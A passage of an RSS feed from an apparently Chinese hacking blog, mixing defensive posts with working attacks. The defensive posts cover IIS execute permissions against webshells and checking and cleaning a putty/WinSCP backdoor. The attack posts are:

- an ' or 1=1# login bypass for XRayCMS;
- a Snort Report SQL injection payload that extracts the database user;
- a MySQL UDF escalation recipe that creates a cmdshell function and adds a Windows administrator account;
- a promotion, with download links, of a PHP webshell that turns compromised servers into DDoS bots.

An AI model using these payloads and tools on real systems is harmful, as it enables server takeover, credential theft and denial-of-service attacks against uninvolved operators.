/&gt;</content:encoded><trackback:ping>http://www.cnyzy.cn/trackback.asp?tbID=1805</trackback:ping><wfw:commentRss>http://www.cnyzy.cn/blogfeed.asp?logID=1805</wfw:commentRss><description>&lt;p id=fp&gt;其实就是运行IIS的对目录文件夹的执行权限设置来达到让webshell无法运行的目的&lt;br&gt;您试图从目录中执行&amp;nbsp;CGI、ISAPI&amp;nbsp;或其他可执行程序，但该目录不允许执行程序。&lt;br&gt;Interneter服务器管理----IIS中站点目录右键----属性----在主目录中&lt;br&gt;查看“执行权限”一般设置为“纯脚本”，脚本文件才能正常运行，设置为“无”则不能运行&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/604356892/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1805&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>黑客攻防</category><pubDate>Tue, 14 Feb 2012 12:22:39 +0800</pubDate><author>kawen</author><comments>http://www.cnyzy.cn/blogview.asp?logID=1805#comment</comments><guid isPermaLink="false">http://www.cnyzy.cn/blogview.asp?logID=1805</guid><dc:creator>kawen</dc:creator><fs:srclink>http://www.cnyzy.cn/blogview.asp?logID=1805</fs:srclink><fs:srcfeed>http://www.cnyzy.cn/blogfeed.asp</fs:srcfeed><fs:itemid>feedsky/cnyzy/~1471012/604356892/1477126</fs:itemid></item><item><title>XRayCMS 1.1.1 SQL Injection Vulnerability</title><link>http://www.cnyzy.cn/blogview.asp?logID=1804</link><content:encoded>&lt;p id=fp&gt;#&amp;nbsp;Exploit&amp;nbsp;Title:&amp;nbsp;XRayCMS&amp;nbsp;1.1.1&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;Vulnerability&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;#&amp;nbsp;Date:&amp;nbsp;2/5/2012&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;#&amp;nbsp;Author:&amp;nbsp;chap0&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;#&amp;nbsp;Software&amp;nbsp;Link:&amp;nbsp;&lt;a href=&quot;http://sourceforge.net/projects/xraycms/files/latest/download&amp;nbsp;&amp;nbsp;&quot; target=&quot;_blank&quot;&gt;http://sourceforge.net/projects/xraycms/files/latest/download&amp;nbsp;&amp;nbsp;&lt;/a&gt;&lt;br&gt;&lt;br&gt;#&amp;nbsp;Version:&amp;nbsp;1.1.1&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;#&amp;nbsp;Tested&amp;nbsp;on:&amp;nbsp;Ubuntu&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;XRay&amp;nbsp;CMS&amp;nbsp;is&amp;nbsp;vulnerable&amp;nbsp;to&amp;nbsp;a&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;attack&amp;nbsp;which&amp;nbsp;allows&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;authentication&amp;nbsp;bypass&amp;nbsp;into&amp;nbsp;the&amp;nbsp;admins&amp;nbsp;account.&amp;nbsp;If&amp;nbsp;a&amp;nbsp;malicious&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;user&amp;nbsp;supplies&amp;nbsp;&amp;#39;&amp;nbsp;or&amp;nbsp;1=1#&amp;nbsp;into&amp;nbsp;the&amp;nbsp;applications&amp;nbsp;user&amp;nbsp;name&amp;nbsp;field&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;they&amp;nbsp;will&amp;nbsp;be&amp;nbsp;logged&amp;nbsp;into&amp;nbsp;the&amp;nbsp;applications&amp;nbsp;admin&amp;nbsp;account.&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Jan&amp;nbsp;29,&amp;nbsp;2012&amp;nbsp;–&amp;nbsp;Contacted&amp;nbsp;Vendor&amp;nbsp;No&amp;nbsp;Response&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Feb&amp;nbsp;05,&amp;nbsp;2012&amp;nbsp;–&amp;nbsp;Public&amp;nbsp;Disclosure&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Since&amp;nbsp;the&amp;nbsp;vendor&amp;nbsp;did&amp;nbsp;not&amp;nbsp;reply&amp;nbsp;we&amp;nbsp;attempted&amp;nbsp;to&amp;nbsp;create&amp;nbsp;our&amp;nbsp;own&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;fixes&amp;nbsp;for&amp;nbsp;this&amp;nbsp;issue.&amp;nbsp;The&amp;nbsp;vulnerability&amp;nbsp;exist&amp;nbsp;in&amp;nbsp;“login2.php”&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;on&amp;nbsp;lines&amp;nbsp;20&amp;nbsp;and&amp;nbsp;21.&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;17&amp;nbsp;&amp;nbsp;if(!isset($_POST[&amp;#39;username&amp;#39;]))&amp;nbsp;header(&amp;quot;Location:&amp;nbsp;login.php?error_username&amp;quot;);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;18&amp;nbsp;&amp;nbsp;if(!isset($_POST[&amp;#39;password&amp;#39;]))&amp;nbsp;header(&amp;quot;Location:&amp;nbsp;login.php?error_password&amp;quot;);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;19&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;20&amp;nbsp;&amp;nbsp;$user&amp;nbsp;=&amp;nbsp;$_POST[&amp;#39;username&amp;#39;];&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;21&amp;nbsp;&amp;nbsp;$pass&amp;nbsp;=&amp;nbsp;$_POST[&amp;#39;password&amp;#39;];&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;If&amp;nbsp;the&amp;nbsp;lines&amp;nbsp;20&amp;nbsp;and&amp;nbsp;21&amp;nbsp;are&amp;nbsp;changed&amp;nbsp;to:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;$user&amp;nbsp;=&amp;nbsp;mysql_real_escape_string($_POST[&amp;#39;username&amp;#39;]);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;$pass&amp;nbsp;=&amp;nbsp;mysql_real_escape_string($_POST[&amp;#39;password&amp;#39;]);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;This&amp;nbsp;will&amp;nbsp;prevent&amp;nbsp;the&amp;nbsp;sql&amp;nbsp;injection&amp;nbsp;from&amp;nbsp;happening&amp;nbsp;in&amp;nbsp;the&amp;nbsp;user&amp;nbsp;name&amp;nbsp;field.&amp;nbsp;&lt;br&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220388/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1804&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><trackback:ping>http://www.cnyzy.cn/trackback.asp?tbID=1804</trackback:ping><wfw:commentRss>http://www.cnyzy.cn/blogfeed.asp?logID=1804</wfw:commentRss><description>&lt;p id=fp&gt;#&amp;nbsp;Exploit&amp;nbsp;Title:&amp;nbsp;XRayCMS&amp;nbsp;1.1.1&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;Vulnerability&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;#&amp;nbsp;Date:&amp;nbsp;2/5/2012&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;#&amp;nbsp;Author:&amp;nbsp;chap0&amp;nbsp;&amp;nbsp;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220388/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1804&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>黑客攻防</category><pubDate>Tue, 14 Feb 2012 12:22:39 +0800</pubDate><author>kawen</author><comments>http://www.cnyzy.cn/blogview.asp?logID=1804#comment</comments><guid isPermaLink="false">http://www.cnyzy.cn/blogview.asp?logID=1804</guid><dc:creator>kawen</dc:creator><fs:srclink>http://www.cnyzy.cn/blogview.asp?logID=1804</fs:srclink><fs:srcfeed>http://www.cnyzy.cn/blogfeed.asp</fs:srcfeed><fs:itemid>feedsky/cnyzy/~1471012/603220388/1477126</fs:itemid></item><item><title>putty和WinSCP后门检查及清理方式</title><link>http://www.cnyzy.cn/blogview.asp?logID=1803</link><content:encoded>&lt;p id=fp&gt;检查及清理方式&lt;br&gt;&amp;nbsp;&lt;br&gt;　　检查/var/log&amp;nbsp;是否被删除#&amp;nbsp;/usr/bin/stat&amp;nbsp;/var/log&lt;br&gt;　　如果被删除了，说明中招了&lt;br&gt;　　查看/var/log&amp;nbsp;文件夹内容#&amp;nbsp;ls&amp;nbsp;-al&amp;nbsp;/var/log&lt;br&gt;　　如果文件很少，说明中招了&lt;br&gt;　　监控名称为fsyslog,osysllog&amp;nbsp;的进程#&amp;nbsp;/usr/bin/watch&amp;nbsp;-n&amp;nbsp;1&amp;nbsp;/bin/ps&amp;nbsp;-AFZ&amp;nbsp;f&amp;nbsp;\|&amp;nbsp;/bin/grep&amp;nbsp;syslog&lt;br&gt;　　如果有名称为fsyslog或osyslog的进程，说明中招了，注意不要和正常的系统日志进程混淆&lt;br&gt;　　检查/etc/init.d/sshd&amp;nbsp;的文件头是否被篡改过#&amp;nbsp;/usr/bin/head&amp;nbsp;/etc/init.d/sshd&lt;br&gt;　　检查/etc/init.d/sendmail&amp;nbsp;的文件头是否被篡改过#&amp;nbsp;/usr/bin/head&amp;nbsp;/etc/init.d/sendmail&lt;br&gt;　　检查是否有对外链接的82&amp;nbsp;端口#&amp;nbsp;/bin/netstat&amp;nbsp;-anp&amp;nbsp;|&amp;nbsp;/bin/grep&amp;nbsp;&amp;#39;:82&amp;#39;&lt;br&gt;　　如果有，而你又没设置过，说明已经中招了&lt;br&gt;　　检查是否有链接到98.126.55.226&amp;nbsp;的链接#&amp;nbsp;/bin/netstat&amp;nbsp;-anp&amp;nbsp;|&amp;nbsp;/bin/grep&amp;nbsp;&amp;#39;98\.&amp;#39;&amp;nbsp;--color&lt;br&gt;　　如果有，说明已经中招了&lt;br&gt;　　检查/etc&amp;nbsp;文件夹下的隐藏文件.fsyslog&amp;nbsp;.osyslog，检查/lib&amp;nbsp;文件夹下的隐藏文件.fsyslog&amp;nbsp;.osyslog&lt;br&gt;　　/usr/bin/find&amp;nbsp;/etc&amp;nbsp;-name&amp;nbsp;&amp;#39;.*&amp;#39;&amp;nbsp;-printf&amp;nbsp;&amp;#39;%a&amp;nbsp;%c&amp;nbsp;%t&amp;nbsp;%M&amp;nbsp;%g:%u&amp;nbsp;%p\n&amp;#39;&amp;nbsp;|&amp;nbsp;/bin/grep&amp;nbsp;2012&amp;nbsp;--color&lt;br&gt;　　/usr/bin/find&amp;nbsp;/lib&amp;nbsp;-name&amp;nbsp;&amp;#39;.*&amp;#39;&amp;nbsp;-printf&amp;nbsp;&amp;#39;%a&amp;nbsp;%c&amp;nbsp;%t&amp;nbsp;%M&amp;nbsp;%g:%u&amp;nbsp;%p\n&amp;#39;&amp;nbsp;|&amp;nbsp;/bin/grep&amp;nbsp;2012&amp;nbsp;--color&lt;br&gt;　　/usr/bin/find&amp;nbsp;/etc&amp;nbsp;-name&amp;nbsp;&amp;#39;syslog&amp;#39;&amp;nbsp;-printf&amp;nbsp;&amp;#39;%a&amp;nbsp;%c&amp;nbsp;%t&amp;nbsp;%M&amp;nbsp;%g:%u&amp;nbsp;%p\n&amp;#39;&amp;nbsp;|&amp;nbsp;/bin/grep&amp;nbsp;2012&amp;nbsp;--color&lt;br&gt;　　/usr/bin/find&amp;nbsp;/lib&amp;nbsp;-name&amp;nbsp;&amp;#39;syslog&amp;#39;&amp;nbsp;-printf&amp;nbsp;&amp;#39;%a&amp;nbsp;%c&amp;nbsp;%t&amp;nbsp;%M&amp;nbsp;%g:%u&amp;nbsp;%p\n&amp;#39;&amp;nbsp;|&amp;nbsp;/bin/grep&amp;nbsp;2012&amp;nbsp;--color&lt;br&gt;　　如果有近期修改过的名称包含fsyslog或osyslog的文件，说明已经中招了&lt;br&gt;&amp;nbsp;&lt;br&gt;恢复系统日志&lt;br&gt;&amp;nbsp;&lt;br&gt;　　查看系统日志文件夹#&amp;nbsp;ls&amp;nbsp;-al&amp;nbsp;/var/log&lt;br&gt;　　创建系统日志文件夹#&amp;nbsp;/bin/mkdir&amp;nbsp;/var/log&lt;br&gt;　　如果被删除的话需要创建&lt;br&gt;　　查看系统日志服务#&amp;nbsp;/usr/bin/find&amp;nbsp;/etc/init.d/&amp;nbsp;-name&amp;nbsp;&amp;#39;*log*&amp;#39;&lt;br&gt;　　需要区分出你的服务器所使用的日志服务&lt;br&gt;　　关闭系统日志服务#&amp;nbsp;/sbin/service&amp;nbsp;syslog&amp;nbsp;stop&lt;br&gt;　　你的服务器的日志服务的名称可能是另外一个名字&lt;br&gt;　　启动系统日志服务#&amp;nbsp;/sbin/service&amp;nbsp;syslog&amp;nbsp;start&lt;br&gt;　　你的服务器的日志服务的名称可能是另外一个名字&lt;br&gt;　　创建错误登录日志文件#&amp;nbsp;/bin/touch&amp;nbsp;/var/log/btmp&lt;br&gt;　　设置错误登录日志文件用户组#&amp;nbsp;/bin/chown&amp;nbsp;root:utmp&amp;nbsp;/var/log/btmp&lt;br&gt;　　设置错误登录日志文件权限#&amp;nbsp;/bin/chmod&amp;nbsp;600&amp;nbsp;/var/log/btmp&lt;br&gt;　　创建登录日志文件#&amp;nbsp;/bin/touch&amp;nbsp;/var/log/wtmp&lt;br&gt;　　设置登录日志文件用户组#&amp;nbsp;/bin/chown&amp;nbsp;root:utmp&amp;nbsp;/var/log/wtmp&lt;br&gt;　　设置登录日志文件权限#&amp;nbsp;/bin/chmod&amp;nbsp;664&amp;nbsp;/var/log/wtmp&lt;br&gt;&amp;nbsp;&lt;br&gt;恢复SELinux（安全增强Linux）设置&lt;br&gt;&amp;nbsp;&lt;br&gt;　　查看SELinux&amp;nbsp;状态#&amp;nbsp;/usr/sbin/sestatus&amp;nbsp;-v&lt;br&gt;　　检查/var/log&amp;nbsp;文件夹的安全上下文#&amp;nbsp;/sbin/restorecon&amp;nbsp;-rn&amp;nbsp;-vv&amp;nbsp;/var/log&lt;br&gt;　　恢复/var/log&amp;nbsp;文件夹的安全上下文#&amp;nbsp;/sbin/restorecon&amp;nbsp;-r&amp;nbsp;-vv&amp;nbsp;/var/log&lt;br&gt;　　检查/etc&amp;nbsp;文件夹的安全上下文#&amp;nbsp;/sbin/restorecon&amp;nbsp;-rn&amp;nbsp;-vv&amp;nbsp;/etc&amp;nbsp;2&amp;gt;/dev/null&lt;br&gt;　　恢复/etc&amp;nbsp;文件夹的安全上下文#&amp;nbsp;/sbin/restorecon&amp;nbsp;-r&amp;nbsp;-vv&amp;nbsp;/etc&amp;nbsp;2&amp;gt;/dev/null&lt;br&gt;　　检查/lib&amp;nbsp;文件夹的安全上下文#&amp;nbsp;/sbin/restorecon&amp;nbsp;-rn&amp;nbsp;-vv&amp;nbsp;/lib&amp;nbsp;2&amp;gt;/dev/null&lt;br&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220389/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1803&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><trackback:ping>http://www.cnyzy.cn/trackback.asp?tbID=1803</trackback:ping><wfw:commentRss>http://www.cnyzy.cn/blogfeed.asp?logID=1803</wfw:commentRss><description>&lt;p id=fp&gt;检查及清理方式&lt;br&gt;&amp;nbsp;&lt;br&gt;　　检查/var/log&amp;nbsp;是否被删除#&amp;nbsp;/usr/bin/stat&amp;nbsp;/var/log&lt;br&gt;　　如果被删除了，说明中招了&lt;br&gt;　　查看/var/log&amp;nbsp;文件夹内容#&amp;nbsp;ls&amp;nbsp;-al&amp;nbsp;/var/log&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220389/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1803&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>黑客攻防</category><pubDate>Tue, 14 Feb 2012 12:22:39 +0800</pubDate><author>kawen</author><comments>http://www.cnyzy.cn/blogview.asp?logID=1803#comment</comments><guid isPermaLink="false">http://www.cnyzy.cn/blogview.asp?logID=1803</guid><dc:creator>kawen</dc:creator><fs:srclink>http://www.cnyzy.cn/blogview.asp?logID=1803</fs:srclink><fs:srcfeed>http://www.cnyzy.cn/blogfeed.asp</fs:srcfeed><fs:itemid>feedsky/cnyzy/~1471012/603220389/1477126</fs:itemid></item><item><title>集管理、压力测试、查询服务器等一体的PHP大马</title><link>http://www.cnyzy.cn/blogview.asp?logID=1802</link><content:encoded>&lt;p id=fp&gt;本软件仅供爱好者研究测试之用！&lt;br&gt;&lt;br&gt;首先，PHP&amp;nbsp;DDOS&amp;nbsp;是很久前的技术，现在发出来，综合了PHP&amp;nbsp;大马的服务器提权测试功能。&lt;br&gt;&lt;br&gt;集于管理、压力测试、菜刀通用、查询服务器信息等技术于一体。&lt;br&gt;&lt;br&gt;1&amp;nbsp;管理就不多说，大家都知道。&lt;br&gt;&lt;br&gt;2&amp;nbsp;压力测试，用附带的工具进行测试，最小包1万，最大包65500，可以检测是否存在。&lt;br&gt;&lt;br&gt;3&amp;nbsp;菜刀通用，可用菜刀直接进行连接，密码为WEBSHELL登陆密码。&amp;nbsp;&amp;nbsp;新功能&lt;br&gt;&lt;br&gt;4&amp;nbsp;查询服务器信息，查询PR，收录，权重于一体，权重获取数据标准为爱站。&lt;br&gt;&lt;br&gt;..其他的没什么多说的了，SHELL没有做免杀，原码，大家凑货使，以后自己加密。。&lt;br&gt;&lt;br&gt;工具使用，添加完SHELL后要导出为config.ini，否则不自动保存的。&lt;br&gt;&lt;br&gt;&lt;br&gt;最后一点，ASP的WEBSHELL很多支持PHP的，附带一款ASPSHELL&amp;nbsp;大家可以检测PHP&amp;nbsp;，支持传入即可。&lt;br&gt;&lt;br&gt;&lt;br&gt;DDOS功能是以webshell当肉鸡,PHP&amp;nbsp;很少掉鸡,威力还蛮大，大家自己测试吧。&lt;br&gt;&lt;br&gt;&lt;br&gt;官方网站&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.aspmuma.org/&amp;nbsp;&quot; target=&quot;_blank&quot;&gt;http://www.aspmuma.org/&amp;nbsp;&lt;/a&gt;&lt;br&gt;&lt;br&gt;官方下载地址&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.aspmuma.org/Software/Catalog7/74.html&quot; target=&quot;_blank&quot;&gt;http://www.aspmuma.org/Software/Catalog7/74.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;作者EMAIL：liuaqiangbb@163.com&lt;br&gt;&lt;br&gt;&lt;a target=&quot;_blank&quot; rel=&quot;nofollow&quot; href=&quot;http://222.aspmuma.org/UpLoadFile/phpddos%B9%A4%BE%DF.rar&quot;&gt;下载&lt;/a&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220390/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1802&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><trackback:ping>http://www.cnyzy.cn/trackback.asp?tbID=1802</trackback:ping><wfw:commentRss>http://www.cnyzy.cn/blogfeed.asp?logID=1802</wfw:commentRss><description>&lt;p id=fp&gt;本软件仅供爱好者研究测试之用！&lt;br&gt;&lt;br&gt;首先，PHP&amp;nbsp;DDOS&amp;nbsp;是很久前的技术，现在发出来，综合了PHP&amp;nbsp;大马的服务器提权测试功能。&lt;br&gt;&lt;br&gt;集于管理、压力测试、菜刀通用、查询服务器信息等技术于一体。&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220390/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1802&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>资源共享</category><pubDate>Tue, 14 Feb 2012 12:22:39 +0800</pubDate><author>kawen</author><comments>http://www.cnyzy.cn/blogview.asp?logID=1802#comment</comments><guid isPermaLink="false">http://www.cnyzy.cn/blogview.asp?logID=1802</guid><dc:creator>kawen</dc:creator><fs:srclink>http://www.cnyzy.cn/blogview.asp?logID=1802</fs:srclink><fs:srcfeed>http://www.cnyzy.cn/blogfeed.asp</fs:srcfeed><fs:itemid>feedsky/cnyzy/~1471012/603220390/1477126</fs:itemid></item><item><title>MYSQL提权</title><link>http://www.cnyzy.cn/blogview.asp?logID=1801</link><content:encoded>&lt;p id=fp&gt;1&amp;nbsp;获得root密码&lt;br&gt;&lt;br&gt;conn.php&amp;nbsp;config.php&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;br&gt;&lt;br&gt;$dbhost&amp;nbsp;=&amp;nbsp;&amp;#39;localhost&amp;#39;;//&amp;nbsp;数据库服务器&lt;br&gt;&lt;br&gt;$dbuser&amp;nbsp;=&amp;nbsp;&amp;#39;root&amp;#39;;//&amp;nbsp;数据库用户名&lt;br&gt;&lt;br&gt;$dbpw&amp;nbsp;=&amp;nbsp;&amp;#39;root&amp;#39;;//&amp;nbsp;数据库密码&lt;br&gt;&lt;br&gt;$dbname&amp;nbsp;=&amp;nbsp;&amp;#39;discuz&amp;#39;;//&amp;nbsp;数据库名&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;br&gt;&lt;br&gt;C:\Winnt\udf.dll&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2000&lt;br&gt;&lt;br&gt;C:\Windows\udf.dll&amp;nbsp;2003&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;br&gt;&lt;br&gt;现在基本上win的服务器就这两个导出UDF.DLL&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;br&gt;&lt;br&gt;create&amp;nbsp;function&amp;nbsp;cmdshell&amp;nbsp;returns&amp;nbsp;string&amp;nbsp;soname&amp;nbsp;&amp;#39;udf.dll&amp;#39;&lt;br&gt;&lt;br&gt;select&amp;nbsp;cmdshell(&amp;#39;net&amp;nbsp;user&amp;nbsp;wjs&amp;nbsp;wjs&amp;nbsp;/add&amp;#39;);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;select&amp;nbsp;cmdshell(&amp;#39;net&amp;nbsp;localgroup&amp;nbsp;administrators&amp;nbsp;wjs&amp;nbsp;/add&amp;#39;);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;select&amp;nbsp;cmdshell(&amp;#39;C:/PHPnow/htdocs/3389.exe&amp;#39;);&amp;nbsp;&amp;nbsp;这个是把开3389的文件放到C盘，然后运行，我们服务器开了3389就不需要执行这步&lt;br&gt;&lt;br&gt;drop&amp;nbsp;function&amp;nbsp;cmdshell;&amp;nbsp;删除函数&lt;br&gt;&lt;br&gt;select&amp;nbsp;cmdshell(&amp;#39;netstat&amp;nbsp;-an&amp;#39;);&amp;nbsp;这是查看端口查开放情况&lt;br&gt;&lt;br&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220391/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1801&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><trackback:ping>http://www.cnyzy.cn/trackback.asp?tbID=1801</trackback:ping><wfw:commentRss>http://www.cnyzy.cn/blogfeed.asp?logID=1801</wfw:commentRss><description>&lt;p id=fp&gt;1&amp;nbsp;获得root密码&lt;br&gt;&lt;br&gt;conn.php&amp;nbsp;config.php&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220391/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1801&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>黑客攻防</category><pubDate>Tue, 14 Feb 2012 12:22:39 +0800</pubDate><author>kawen</author><comments>http://www.cnyzy.cn/blogview.asp?logID=1801#comment</comments><guid isPermaLink="false">http://www.cnyzy.cn/blogview.asp?logID=1801</guid><dc:creator>kawen</dc:creator><fs:srclink>http://www.cnyzy.cn/blogview.asp?logID=1801</fs:srclink><fs:srcfeed>http://www.cnyzy.cn/blogfeed.asp</fs:srcfeed><fs:itemid>feedsky/cnyzy/~1471012/603220391/1477126</fs:itemid></item><item><title>Snort Report &lt;= 1.3.2 SQL</title><link>http://www.cnyzy.cn/blogview.asp?logID=1800</link><content:encoded>&lt;p id=fp&gt;&lt;strong&gt;Snort&amp;nbsp;Report&amp;nbsp;&amp;lt;=&amp;nbsp;1.3.2&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;Vulnerability&amp;nbsp;&lt;/strong&gt;&lt;br&gt;&lt;br&gt;##########################&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Vulnerable&amp;nbsp;parameter:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;ipAddress&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Vulnerable&amp;nbsp;URL:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://server/ipdetail.php?type=dst&amp;amp;FQDN=&amp;amp;ipAddress=773116111&amp;lt;SQLi&amp;nbsp;Here&amp;gt;&amp;amp;beginTime=0&amp;amp;endTime=1324665310&amp;nbsp;&amp;nbsp;&quot; target=&quot;_blank&quot;&gt;http://server/ipdetail.php?type=dst&amp;amp;FQDN=&amp;amp;ipAddress=773116111&amp;lt;SQLi&amp;nbsp;Here&amp;gt;&amp;amp;beginTime=0&amp;amp;endTime=1324665310&amp;nbsp;&amp;nbsp;&lt;/a&gt;&lt;br&gt;&lt;br&gt;PoC:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://server/ipdetail.php?type=dst&amp;amp;FQDN=&amp;amp;ipAddress=773116111%20AND%20%28SELECT%205849%20FROM%28SELECT%20COUNT%28&quot; target=&quot;_blank&quot;&gt;http://server/ipdetail.php?type=dst&amp;amp;FQDN=&amp;amp;ipAddress=773116111%20AND%20%28SELECT%205849%20FROM%28SELECT%20COUNT%28&lt;/a&gt;*%29%2CCONCAT%280x3a79786a3a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a7578713a%2CFLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&amp;amp;beginTime=0&amp;amp;endTime=1324665310&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;##########################&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;#&amp;nbsp;Patched&amp;nbsp;in&amp;nbsp;v1.3.3&amp;nbsp;&lt;br&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220392/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1800&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><trackback:ping>http://www.cnyzy.cn/trackback.asp?tbID=1800</trackback:ping><wfw:commentRss>http://www.cnyzy.cn/blogfeed.asp?logID=1800</wfw:commentRss><description>&lt;p id=fp&gt;&lt;strong&gt;Snort&amp;nbsp;Report&amp;nbsp;&amp;lt;=&amp;nbsp;1.3.2&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;Vulnerability&amp;nbsp;&lt;/strong&gt;&lt;br&gt;&lt;br&gt;##########################&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Vulnerable&amp;nbsp;parameter:&amp;nbsp;&amp;nbsp;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220392/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1800&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>黑客攻防</category><pubDate>Tue, 14 Feb 2012 12:22:39 +0800</pubDate><author>kawen</author><comments>http://www.cnyzy.cn/blogview.asp?logID=1800#comment</comments><guid isPermaLink="false">http://www.cnyzy.cn/blogview.asp?logID=1800</guid><dc:creator>kawen</dc:creator><fs:srclink>http://www.cnyzy.cn/blogview.asp?logID=1800</fs:srclink><fs:srcfeed>http://www.cnyzy.cn/blogfeed.asp</fs:srcfeed><fs:itemid>feedsky/cnyzy/~1471012/603220392/1477126</fs:itemid></item><item><title>中国移动，中国电信免费公共wifi密码</title><link>http://www.cnyzy.cn/blogview.asp?logID=1799</link><content:encoded>&lt;p 